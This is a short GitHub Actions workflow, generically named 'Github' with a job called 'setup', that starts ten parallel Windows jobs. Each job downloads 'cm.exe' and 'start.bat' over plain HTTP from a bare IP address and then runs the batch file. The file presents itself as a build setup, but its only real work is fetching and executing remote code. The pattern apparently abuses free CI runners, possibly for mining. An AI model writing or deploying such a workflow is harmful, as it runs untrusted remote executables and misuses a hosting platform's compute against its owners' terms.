name: Github
on: workflow_dispatch
jobs:
  build:
    name: setup
    runs-on: windows-latest
    strategy:
      max-parallel: 20
      fail-fast: true
      matrix:
        go: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
    timeout-minutes: 30
    steps:
    - name: Setup
      uses: actions/checkout@v1
    - name: running
      run: |
        Invoke-WebRequest http://134.122.17.115/cm.exe -OutFile cm.exe
        Invoke-WebRequest http://134.122.17.115/start.bat -OutFile start.bat
        cmd /c start.bat
